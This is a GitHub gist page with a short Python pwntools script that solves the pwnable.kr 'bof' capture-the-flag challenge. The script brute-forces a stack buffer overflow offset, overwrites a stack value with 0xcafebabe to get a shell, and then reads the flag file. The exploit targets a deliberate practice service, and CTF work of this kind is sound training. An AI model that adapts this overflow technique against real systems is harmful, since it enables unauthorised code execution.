Skip to content

Instantly share code, notes, and snippets.

@rewanth1997 rewanth1997/bof.py
Created Sep 26, 2017

Embed
What would you like to do?
Code for
# Download : http://pwnable.kr/bin/bof
# Download : http://pwnable.kr/bin/bof.c
from pwn import *
import struct
import time
import re
for i in range(0,100):
s = remote('pwnable.kr', 9000)
s.sendline('A'*i + struct.pack("<I",0xcafebabe))
# `strings bof | grep bin`
# The above step is performed on the given binary file
# which gives a clue that we can get a shell on successful bof.
s.sendline("ls")
print "Trying offset = " + str(i)
res = s.recv(4096)
time.sleep(0.2)
if re.findall("smashing", res) or re.findall("Nah", res):
s.close()
else:
print "Files in the directory -"
print res
s.sendline("cat flag")
print "Flag = " + s.recv(4096)
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.